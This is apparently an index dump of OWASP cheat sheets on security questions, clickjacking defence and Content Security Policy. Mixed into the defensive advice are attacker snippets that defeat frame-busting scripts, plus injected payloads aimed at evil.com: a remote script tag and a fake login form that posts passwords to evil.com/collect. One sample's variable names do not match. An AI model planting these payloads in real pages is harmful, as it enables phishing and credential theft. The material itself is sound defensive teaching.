WARNING: Security questions are no longer recognized as an acceptable authentication factor per NIST SP 800-63. Account recovery is just an alternate way to authenticate so it should be no weaker than regular authentication. See SP 800-63B sec 5.1.1.2 paragraph 4: Verifiers SHALL NOT prompt subscribers to use specific types of information (e.g., \u201cWhat was the name of your first pet?\u201d) when choosing memorized secrets.

If you are curious, please have a look at this study by Microsoft Research in 2009 and this study performed at Google in 2015. The accompanying Security blog update includes an infographic on the issues identified with security questions.

Please Note: While there are no acceptable uses of security questions in secure software, this cheat sheet provides guidance on how to choose strong security questions for legacy purposes.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#choosing-security-questions","title":"Choosing Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#desired-characteristics","title":"Desired Characteristics","text":"

Any security questions presented to users to reset forgotten passwords must meet the following characteristics:

Characteristic Explanation Memorable The user must be able to recall the answer to the question, potentially years after creating their account. Consistent The answer to the question must not change over time. Applicable The user must be able to answer the question. Confidential The answer to the question must be hard for an attacker to obtain. Specific The answer should be clear to the user."},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#types-of-security-questions","title":"Types of Security Questions","text":"

Security questions fall into two main types. With user defined security questions, the user must choose a question from a list, and provide an answer to the question. Common examples are \"What is your favourite colour?\" or \"What was your first car?\"

These are easy for applications to implement, as the additional information required is provided by the user when they first create their account. However, users will often choose weak or easily discovered answers to these questions.

System defined security questions are based on information that is already known about the user. This approach avoids having to ask the user to provide specific security questions and answers, and also prevents them from being able to choose weak details. However it relies on sufficient information already being stored about the user, and on this information being hard for an attacker to obtain.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#user-defined-security-questions","title":"User Defined Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#bad-questions","title":"Bad Questions","text":"

Any questions that do not have all of the characteristics discussed above should be avoided. The table below gives some examples of bad security questions:

Question Problem When is your date of birth? Easy for an attacker to discover. What is your memorable date? Most users will just enter their birthday. What is your favourite movie? Likely to change over time. What is your favourite cricket team? Not applicable to most users. What is the make and model of your first car? Fairly small range of likely answers.

Additionally, the context of the application must be considered when deciding whether questions are good or bad. For example, a question such as \"What was your maths teacher's surname in your 8th year of school?\" would be very easy to guess if it was using in a virtual learning environment for your school (as other students probably know this information), but would be much stronger for an online gaming website.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#good-questions","title":"Good Questions","text":"

Many good security questions are not applicable to all users, so the best approach is to give the user a list of security questions that they can choose from. This allows you to have more specific questions (with more secure answers), while still providing every user with questions that they can answer.

The following list provides some examples of good questions:

Much like passwords, there is a risk that users will re-use recovery questions between different sites, which could expose the users if the other site is compromised. As such, there are benefits to having unique security questions that are unlikely to be shared between sites. An easy way to achieve this is to create more targeted questions based on the type of application. For example, on a share dealing platform, financial related questions such as \"What is the first company you owned shares in?\" could be used.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#allowing-users-to-write-their-own-questions","title":"Allowing Users to Write Their Own Questions","text":"

Allowing users to write their own security questions can result in them choosing very strong and unique questions that would be very hard for an attacker to guess. However, there is also a significant risk that users will choose weak questions. In some cases, users might even set a recovery question to a reminder of what their password is - allowing anyone guessing their email address to compromise their account.

As such, it is generally best not to allow users to write their own questions.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#restricting-answers","title":"Restricting Answers","text":"

Enforcing a minimum length for answers can prevent users from entering strings such as \"a\" or \"123\" for their answers. However, depending on the questions asked, it could also prevent users from being able to correctly answer the question. For example, asking for a first name or surname could result in a two letter answer such as \"Li\", and a colour-based question could be four letters such as \"blue\".

Answers should also be checked against a block list, including:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#renewing-security-questions","title":"Renewing Security Questions","text":"

If the security questions are not used as part of the main authentication process, then consider periodically prompting the user to review their security questions and verify that they still know the answers. This should give them a chance to update any answers that may have changed (although ideally this shouldn't happen with good questions), and increases the likelihood that they will remember them if they ever need to recover their account.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#system-defined-security-questions","title":"System Defined Security Questions","text":"

System defined security questions are based on information that is already known about the user. The users' personal details are often used, including the full name, address and date of birth. However these can easily be obtained by an attacker from social media, and as such provide a very weak level of authentication.

The questions that can be used will vary hugely depending on the application, and how much information is already held about the user. When deciding which bits of information may be usable for security questions, the following areas should be considered:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#using-security-questions","title":"Using Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#when-to-use-security-questions","title":"When to Use Security Questions","text":"

Applications should generally use a password along with a second authentication factor (such as an OTP code) to authenticate users. The combination of a password and security questions does not constitute MFA, as both factors as the same (i.e. something you know)..

Security questions should never be relied upon as the sole mechanism to authenticate a user. However, they can provide a useful additional layer of security when other stronger factors are not available. Common cases where they would be used include:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#authentication-flow","title":"Authentication Flow","text":"

Security questions may be used as part of the main authentication flow to supplement passwords where MFA is not available. A typical authentication flow would be:

If the answers to the security questions are incorrect, then this should be counted as a failed login attempt, and the account lockout counter should be incremented for the user.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#forgotten-password-or-lost-mfa-token-flow","title":"Forgotten Password or Lost MFA Token Flow","text":"

Forgotten password functionality often provides a mechanism for attackers to enumerate user accounts if it is not correctly implemented. The following flow avoids this issue by only displaying the security questions once the user has proved ownership of the email address:

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#how-to-use-security-questions","title":"How to Use Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#storing-answers","title":"Storing Answers","text":"

The answers to security questions may contain personal information about the user, and may also be re-used by the user between different applications. As such, they should be treated in the same way as passwords, and stored using a secure hashing algorithm such as Bcrypt. The password storage cheat sheet contains further guidance on this.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#comparing-answers","title":"Comparing Answers","text":"

Comparing the answers provided by the user with the stored answer in a case insensitive manner makes it much easier for the user. The simplest way to do this is to convert the answer to lowercase before hashing the answer to store it, and then lowercase the user-provided answer before comparing them.

It is also beneficial to give the user some indication of the format that they should use to enter answers. This could be done through input validation, or simply by recommending that the user enters their details in a specific format. For example, when asking for a date, indicating that the format should be \"DD/MM/YYYY\" will mean that the user doesn't have to try and guess what format they entered when registering.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#updating-answers","title":"Updating Answers","text":"

When the user updates the answers to their security questions, this should be treated as a sensitive operation within the application. As such, the user should be required to re-authenticate themselves by entering their password (or ideally using MFA), in order to prevent an attacker updating the questions if they gain temporary access to the user's account.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#multiple-security-questions","title":"Multiple Security Questions","text":"

When security questions are used, the user can either be asked a single question, or can be asked multiple questions at the same time. This provides a greater level of assurance, especially if the questions are diverse, as an attacker would need to obtain more information about the target user. A mixture of user-defined and system-defined questions can be very effective for this.

If the user is asked a single question out of a bank of possible questions, then this question should not be changed until the user has answered it correctly. If the attacker is allowed to try answering all of the different security questions, this greatly increases the chance that they will be able to guess or obtain the answer to one of them.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html","title":"Clickjacking Defense Cheat Sheet","text":""},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet is intended to provide guidance for developers on how to defend against Clickjacking, also known as UI redress attacks.

There are three main mechanisms that can be used to defend against these attacks:

Note that these mechanisms are all independent of each other, and where possible more than one of them should be implemented in order to provide defense in depth.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#defending-with-content-security-policy-csp-frame-ancestors-directive","title":"Defending with Content Security Policy (CSP) frame-ancestors directive","text":"

The frame-ancestors directive can be used in a Content-Security-Policy HTTP response header to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid Clickjacking attacks by ensuring that their content is not embedded into other sites.

frame-ancestors allows a site to authorize multiple domains using the normal Content Security Policy semantics.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#content-security-policy-frame-ancestors-examples","title":"Content-Security-Policy: frame-ancestors Examples","text":"

Common uses of CSP frame-ancestors:

Note that the single quotes are required around self and none, but may not occur around other source expressions.

See the following documentation for further details and more complex examples:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#limitations","title":"Limitations","text":""},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#browser-support","title":"Browser Support","text":"

The following browsers support CSP frame-ancestors.

References:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#defending-with-x-frame-options-response-headers","title":"Defending with X-Frame-Options Response Headers","text":"

The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid Clickjacking attacks, by ensuring that their content is not embedded into other sites. Set the X-Frame-Options header for all responses containing HTML content. The possible values are \"DENY\", \"SAMEORIGIN\", or \"ALLOW-FROM uri\"

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#x-frame-options-header-types","title":"X-Frame-Options Header Types","text":"

There are three possible values for the X-Frame-Options header:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#browser-support_1","title":"Browser Support","text":"

The following browsers support X-Frame-Options headers.

References:

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#implementation","title":"Implementation","text":"

To implement this protection, you need to add the X-Frame-Options HTTP Response header to any page that you want to protect from being clickjacked via framebusting. One way to do this is to add the HTTP Response Header manually to every page. A possibly simpler way is to implement a filter that automatically adds the header to every page or to add it at Web Application Firewall of Web/Application Server level.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#common-defense-mistakes","title":"Common Defense Mistakes","text":"

Meta-tags that attempt to apply the X-Frame-Options directive DO NOT WORK. For example, <meta http-equiv=\"X-Frame-Options\" content=\"deny\"> will not work. You must apply the X-FRAME-OPTIONS directive as HTTP Response Header as described above.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#limitations_1","title":"Limitations","text":" "},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#defending-with-samesite-cookies","title":"Defending with SameSite Cookies","text":"

The SameSite cookie attribute defined in RFC 6265bis is primarily intended to defend against cross-site request forgery (CSRF); however it can also provide protection against Clickjacking attacks.

Cookies with a SameSite attribute of either strict or lax will not be included in requests made to a page within an <iframe>. This means that if the session cookies are marked as SameSite, any Clickjacking attack that requires the victim to be authenticated will not work, as the cookie will not be sent. An article on the Netsparker blog provides further details on which types of requests cookies are sent for with the different SameSite policies.

This approach is discussed on the JavaScript.info website.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#limitations_2","title":"Limitations","text":"

If the Clickjacking attack does not require the user to be authenticated, this attribute will not provide any protection.

Additionally, while SameSite attribute is supported by most modern browsers, there are still some users (approximately 6% as of November 2020) with browsers that do not support it.

The use of this attribute should be considered as part of a defence-in-depth approach, and it should not be relied upon as the sole protective measure against Clickjacking.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#best-for-now-legacy-browser-frame-breaking-script","title":"Best-for-now Legacy Browser Frame Breaking Script","text":"

One way to defend against clickjacking is to include a \"frame-breaker\" script in each page that should not be framed. The following methodology will prevent a webpage from being framed even in legacy browsers, that do not support the X-Frame-Options-Header.

In the document HEAD element, add the following:

First apply an ID to the style element itself:

<style id=\"antiClickjack\">\nbody{display:none !important;}\n</style>\n

Then, delete that style by its ID immediately after in the script:

<script type=\"text/javascript\">\nif\u00a0(self\u00a0===\u00a0top)\u00a0{\nvar\u00a0antiClickjack\u00a0=\u00a0document.getElementById(\"antiClickjack\");\nantiClickjack.parentNode.removeChild(antiClickjack);\n}\u00a0else\u00a0{\ntop.location\u00a0=\u00a0self.location;\n}\n</script>\n

This way, everything can be in the document HEAD and you only need one method/taglib in your API.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#windowconfirm-protection","title":"window.confirm() Protection","text":"

The use of X-Frame-Options or a frame-breaking script is a more fail-safe method of clickjacking protection. However, in scenarios where content must be frameable, then a window.confirm() can be used to help mitigate Clickjacking by informing the user of the action they are about to perform.

Invoking window.confirm() will display a popup that cannot be framed. If the window.confirm() originates from within an iframe with a different domain than the parent, then the dialog box will display what domain the window.confirm() originated from. In this scenario the browser is displaying the origin of the dialog box to help mitigate Clickjacking attacks. It should be noted that Internet Explorer is the only known browser that does not display the domain that the window.confirm() dialog box originated from, to address this issue with Internet Explorer insure that the message within the dialog box contains contextual information about the type of action being performed. For example:

<script type=\"text/javascript\">\nvar\u00a0action_confirm\u00a0=\u00a0window.confirm(\"Are\u00a0you\u00a0sure\u00a0you\u00a0want\u00a0to\u00a0delete\u00a0your\u00a0youtube\u00a0account?\")\nif\u00a0(action_confirm)\u00a0{\n//...\u00a0Perform\u00a0action\n}\u00a0else\u00a0{\n//...\u00a0The\u00a0user\u00a0does\u00a0not\u00a0want\u00a0to\u00a0perform\u00a0the\u00a0requested\u00a0action.`\n}\n</script>\n
"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#insecure-non-working-scripts-do-not-use","title":"Insecure Non-Working Scripts DO NOT USE","text":"

Consider the following snippet which is NOT recommended for defending against clickjacking:

<script>if (top!=self) top.location.href=self.location.href</script>\n

This simple frame breaking script attempts to prevent the page from being incorporated into a frame or iframe by forcing the parent window to load the current frame's URL. Unfortunately, multiple ways of defeating this type of script have been made public. We outline some here.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#double-framing","title":"Double Framing","text":"

Some frame busting techniques navigate to the correct page by assigning a value to parent.location. This works well if the victim page is framed by a single page. However, if the attacker encloses the victim in one frame inside another (a double frame), then accessing parent.location becomes a security violation in all popular browsers, due to the descendant frame navigation policy. This security violation disables the counter-action navigation.

Victim frame busting code:

if(top.location != self.location) {\nparent.location = self.location;\n}\n

Attacker top frame:

<iframe src=\"attacker2.html\">\n

Attacker sub-frame:

<iframe src=\"http://www.victim.com\">\n
"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#the-onbeforeunload-event","title":"The onBeforeUnload Event","text":"

A user can manually cancel any navigation request submitted by a framed page. To exploit this, the framing page registers an onBeforeUnload handler which is called whenever the framing page is about to be unloaded due to navigation. The handler function returns a string that becomes part of a prompt displayed to the user.

Say the attacker wants to frame PayPal. He registers an unload handler function that returns the string \"Do you want to exit PayPal?\". When this string is displayed to the user is likely to cancel the navigation, defeating PayPal's frame busting attempt.

The attacker mounts this attack by registering an unload event on the top page using the following code:

<script>\nwindow.onbeforeunload = function(){\nreturn \"Asking the user nicely\";\n}\n</script>\n\n<iframe src=\"http://www.paypal.com\">\n

PayPal's frame busting code will generate a BeforeUnload event activating our function and prompting the user to cancel the navigation event.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#no-content-flushing","title":"No-Content Flushing","text":"

While the previous attack requires user interaction, the same attack can be done without prompting the user. Most browsers (IE7, IE8, Google Chrome, and Firefox) enable an attacker to automatically cancel the incoming navigation request in an onBeforeUnload event handler by repeatedly submitting a navigation request to a site responding with \"204 - No Content\".

Navigating to a No Content site is effectively a NOP, but flushes the request pipeline, thus canceling the original navigation request. Here is sample code to do this:

var preventbust = 0\nwindow.onbeforeunload = function() { killbust++ }\nsetInterval( function() {\nif(killbust > 0){\nkillbust = 2;\nwindow.top.location = 'http://nocontent204.com'\n}\n}, 1);\n
<iframe src=\"http://www.victim.com\">\n
"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#exploiting-xss-filters","title":"Exploiting XSS filters","text":"

IE8 and Google Chrome introduced reflective XSS filters that help protect web pages from certain types of XSS attacks. Nava and Lindsay (at Blackhat) observed that these filters can be used to circumvent frame busting code. The IE8 XSS filter compares given request parameters to a set of regular expressions in order to look for obvious attempts at cross-site scripting. Using \"induced false positives\", the filter can be used to disable selected scripts. By matching the beginning of any script tag in the request parameters, the XSS filter will disable all inline scripts within the page, including frame busting scripts. External scripts can also be targeted by matching an external include, effectively disabling all external scripts. Since subsets of the JavaScript loaded is still functional (inline or external) and cookies are still available, this attack is effective for clickjacking.

Victim frame busting code:

<script>\nif(top != self) {\ntop.location = self.location;\n}\n</script>\n

Attacker:

<iframe src=\"http://www.victim.com/?v=<script>if''>\n

The XSS filter will match that parameter <script>if to the beginning of the frame busting script on the victim and will consequently disable all inline scripts in the victim's page, including the frame busting script. The XSSAuditor filter available for Google Chrome enables the same exploit.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#clobbering-toplocation","title":"Clobbering top.location","text":"

Several modern browsers treat the location variable as a special immutable attribute across all contexts. However, this is not the case in IE7 and Safari 4.0.4 where the location variable can be redefined.

IE7: Once the framing page redefines location, any frame busting code in a subframe that tries to read top.location will commit a security violation by trying to read a local variable in another domain. Similarly, any attempt to navigate by assigning top.location will fail.

Victim frame busting code:

if(top.location != self.location) {\ntop.location = self.location;\n}\n

Attacker:

<script>var location = \"clobbered\";</script>\n<iframe src=\"http://www.victim.com\"></iframe>\n

Safari 4.0.4:

We observed that although location is kept immutable in most circumstances, when a custom location setter is defined via defineSetter (through window) the object location becomes undefined.

The framing page simply does:

<script>\nwindow.defineSetter(\"location\", function(){});\n</script>\n

Now any attempt to read or navigate the top frame's location will fail.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#restricted-zones","title":"Restricted zones","text":"

Most frame busting relies on JavaScript in the framed page to detect framing and bust itself out. If JavaScript is disabled in the context of the subframe, the frame busting code will not run. There are unfortunately several ways of restricting JavaScript in a subframe:

In IE 8:

<iframe src=\"http://www.victim.com\" security=\"restricted\"></iframe>\n

In Chrome:

<iframe src=\"http://www.victim.com\" sandbox></iframe>\n

Firefox and IE:

Activate designMode in parent page.

document.designMode = \"on\";\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html","title":"Content Security Policy Cheat Sheet","text":""},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article brings forth a way to integrate the defense in depth concept to the client-side of web applications. By injecting the Content-Security-Policy (CSP) headers from the server, the browser is aware and capable of protecting the user from dynamic calls that will load content into the page currently being visited.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#context","title":"Context","text":"

The increase in XSS (Cross-Site Scripting), clickjacking, and cross-site leak vulnerabilities demands a more defense in depth security approach.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#defense-against-xss","title":"Defense against XSS","text":"

CSP defends against XSS attacks in the following ways:

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#1-restricting-inline-scripts","title":"1. Restricting Inline Scripts","text":"

By preventing the page from executing inline scripts, attacks like injecting

<script>document.body.innerHTML='defaced'</script>\n

will not work.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#2-restricting-remote-scripts","title":"2. Restricting Remote Scripts","text":"

By preventing the page from loading scripts from arbitrary servers, attacks like injecting

<script src=\"https://evil.com/hacked.js\"></script>\n

will not work.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#3-restricting-unsafe-javascript","title":"3. Restricting Unsafe JavaScript","text":"

By preventing the page from executing text-to-JavaScript functions like eval, the website will be safe from vulnerabilities like the this:

// A Simple Calculator\nvar op1 = getUrlParameter(\"op1\");\nvar op2 = getUrlParameter(\"op2\");\nvar sum = eval(`${op1} + ${op2}`);\nconsole.log(`The sum is: ${sum}`);\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#4-restricting-form-submissions","title":"4. Restricting Form submissions","text":"

By restricting where HTML forms on your website can submit their data, injecting phishing forms won't work either.

<form method=\"POST\" action=\"https://evil.com/collect\">\n<h3>Session expired! Please login again.</h3>\n<label>Username</label>\n<input type=\"text\" name=\"username\"/>\n\n<label>Password</label>\n<input type=\"password\" name=\"pass\"/>\n\n<input type=\"Submit\" value=\"Login\"/>\n</form>\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#5-restricting-objects","title":"5. Restricting Objects","text":"

And by restricting the HTML object tag, it also won't be possible for an attacker to inject malicious flash/Java/other legacy executables on the page.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#defense-against-framing-attacks","title":"Defense against framing attacks","text":"

Attacks like clickjacking and some variants of browser side-channel attacks (xs-leaks) require a malicious website to load the target website in a frame.

Historically the X-Frame-Options header has been used for this, but it has been obsoleted by the frame-ancestors CSP directive.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#defense-in-depth","title":"Defense in Depth","text":"

A strong CSP provides an effective second layer of protection against various types of vulnerabilities, especially XSS. Although CSP doesn't prevent web applications from containing vulnerabilities, it can make those vulnerabilities significantly more difficult for an attacker to exploit.

Even on a fully static website, which does not accept any user input, a CSP can be used to enforce the use of Subresource Integrity (SRI). This can help prevent malicious code from being loaded on the website if one of the third-party sites hosting JavaScript files (such as analytics scripts) is compromised.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#csp-is-not-a-substitute-for-secure-development","title":"CSP is not a substitute for secure development","text":"

CSP should not be relied upon as the only defensive mechanism against XSS. You must still follow good development practices such as the ones described in Cross-Site Scripting Prevention Cheat Sheet, and then deploy CSP on top of that as a bonus security layer.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#policy-delivery","title":"Policy Delivery","text":"

You can deliver a Content Security Policy to your website in three ways.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#1-content-security-policy-header","title":"1. Content-Security-Policy Header","text":"

Send a Content-Security-Policy HTTP response header from your web server.

Content-Security-Policy: ...\n

Using a header is the preferred way and supports the full CSP feature set. Send it in all HTTP responses, not just the index page.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#2-content-security-policy-report-only-header","title":"2. Content-Security-Policy-Report-Only Header","text":"

Using the Content-Security-Policy-Report-Only, you can deliver a CSP that doesn't get enforced.

Content-Security-Policy-Report-Only: ...\n

Still, violation reports are printed to the console and delivered to a violation endpoint if the report-to and report-uri directives are used.

Browsers fully support the ability of a site to use both Content-Security-Policy and Content-Security-Policy-Report-Only together, without any issues. This pattern can be used for example to run a strict Report-Only policy (to get many violation reports), while having a looser enforced policy (to avoid breaking legitimate site functionality).

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#3-content-security-policy-meta-tag","title":"3. Content-Security-Policy Meta Tag","text":"

Sometimes you cannot use the Content-Security-Policy header if you are, e.g., Deploying your HTML files in a CDN where the headers are out of your control.

In this case, you can still use CSP by specifying a http-equiv meta tag in the HTML markup, like so:

<meta http-equiv=\"Content-Security-Policy\" content=\"...\">\n

Almost everything is still supported, including full XSS defenses. However, you will not be able to use framing protections, sandboxing, or a CSP violation logging endpoint.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#http-headers","title":"HTTP Headers","text":"

The following are headers for CSP.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#csp-directives","title":"CSP Directives","text":"

Multiple types of directives exist that allow the developer to control the flow of the policies granularly.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#fetch-directives","title":"Fetch Directives","text":"

Fetch directives tell the browser the locations to trust and load resources from.

Most fetch directives have a certain fallback list specified in w3. This list allows for granular control of the source of scripts, images, files, etc.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#document-directives","title":"Document Directives","text":"

Document directives instruct the browser about the properties of the document to which the policies will apply to.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#navigation-directives","title":"Navigation Directives","text":"

Navigation directives instruct the browser about the locations that the document can navigate to.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#reporting-directives","title":"Reporting Directives","text":"

Reporting directives deliver violations of prevented behaviors to specified locations. These directives serve no purpose on their own and are dependent on other directives.

In order to ensure backward compatibility, use the 2 directives in conjunction. Whenever a browser supports report-to, it will ignore report-uri. Otherwise, report-uri will be used.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#special-directive-sources","title":"Special Directive Sources","text":"Value Description 'none' No URLs match. 'self' Refers to the origin site with the same scheme and port number. 'unsafe-inline' Allows the usage of inline scripts or styles. 'unsafe-eval' Allows the usage of eval in scripts. 'strict-dynamic' Informs the browser to trust scripts originating from a root trusted script.

Note: strict-dynamic is not a standalone directive and should be used in combination with other directive values, such as nonce, hashes, etc.

To better understand how the directive sources work, check out the source lists from w3c.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#hashes","title":"Hashes","text":"

When inline scripts are required, the script-src 'hash_algo-hash' is one option for allowing only specific scripts to execute.

Content-Security-Policy: script-src 'sha256-V2kaaafImTjn8RQTWZmF4IfGfQ7Qsqsw9GWaFjzFNPg='\n

To get the hash, look at Google Chrome developer tools for violations like this:

\u274c Refused to execute inline script because it violates the following Content Security Policy directive: \"...\" Either the 'unsafe-inline' keyword, a hash ('sha256-V2kaaafImTjn8RQTWZmF4IfGfQ7Qsqsw9GWaFjzFNPg='), or a nonce...

You can also use this hash generator. This is a great example of using hashes.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#note","title":"Note","text":"

Using hashes is generally not a very good approach. If you change anything inside the script tag (even whitespace) by, e.g., formatting your code, the hash will be different, and the script won't render.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#nonces","title":"Nonces","text":"

Nonces are unique one-time-use random values that you generate for each HTTP response, and add to the Content-Security-Policy header, like so:

const nonce = uuid.v4();\nscriptSrc += ` 'nonce-${nonce}'`;\n

You would then pass this nonce to your view (using nonces requires a non-static HTML) and render script tags that look something like this:

<script nonce=\"<%= nonce %>\">\n...\n</script>\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#warning","title":"Warning","text":"

Don't create a middleware that replaces all script tags with \"script nonce=...\" because attacker-injected scripts will then get the nonces as well. You need an actual HTML templating engine to use nonces.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#strict-dynamic","title":"strict-dynamic","text":"

The strict-dynamic directive can be used in combination with either, hashes or nonces.

If the script block is creating additional DOM elements and executing JS inside of them, strict-dynamic tells the browser to trust those elements.

Note that strict-dynamic is a CSP level 3 feature and not very widely supported yet. For more details, check out strict-dynamic usage.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#csp-sample-policies","title":"CSP Sample Policies","text":""},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#basic-csp-policy","title":"Basic CSP Policy","text":"

This policy prevents cross-site framing and cross-site form-submissions. It will only allow resources from the originating domain for all the default level directives and will not allow inline scripts/styles to execute.

If your application functions with these restrictions, it drastically reduces your attack surface and works with most modern browsers.

The most basic policy assumes:

Content-Security-Policy:\u00a0default-src\u00a0'self'; frame-ancestors 'self'; form-action 'self';\n

To tighten further, one can apply the following:

Content-Security-Policy:\u00a0default-src\u00a0'none';\u00a0script-src\u00a0'self';\u00a0connect-src\u00a0'self';\u00a0img-src\u00a0'self';\u00a0style-src\u00a0'self'; frame-ancestors 'self'; form-action 'self';\n

This policy allows images, scripts, AJAX, and CSS from the same origin and does not allow any other resources to load (e.g., object, frame, media, etc.).

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#upgrading-insecure-requests","title":"Upgrading insecure requests","text":"

If the developer is migrating from HTTP to HTTPS, the following directive will ensure that all requests will be sent over HTTPS with no fallback to HTTP:

Content-Security-Policy: upgrade-insecure-requests;\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#preventing-framing-attacks-clickjacking-cross-site-leaks","title":"Preventing framing attacks (clickjacking, cross-site leaks)","text":""},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#strict-policy","title":"Strict Policy","text":"

A strict policy's role is to protect against classical stored, reflected, and some of the DOM XSS attacks and should be the optimal goal of any team trying to implement CSP.

Google went ahead and set up a guide to adopt a strict CSP based on nonces.

Based on a presentation at LocoMocoSec, the following two policies can be used to apply a strict policy:

script-src 'nonce-r4nd0m' 'strict-dynamic';\nobject-src 'none'; base-uri 'none';\n
script-src 'nonce-r4nd0m';\nobject-src 'none'; base-uri 'none';\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#refactoring-inline-code","title":"Refactoring inline code","text":"

When default-src or script-src* directives are active, CSP by default disables any JavaScript code placed inline in the HTML source, such as this:

<script>\nvar foo = \"314\"\n<script>\n

The inline code can be moved to a separate JavaScript file and the code in the page becomes:

<script src=\"app.js\">\n</script>\n

With app.js containing the var foo = \"314\" code.

The inline code restriction also applies to inline event handlers, so that the following construct will be blocked under CSP:

<button id=\"button1\" onclick=\"doSomething()\">\n

This should be replaced by addEventListener calls:

document.getElementById(\"button1\").addEventListener('click',\u00a0doSomething);\n
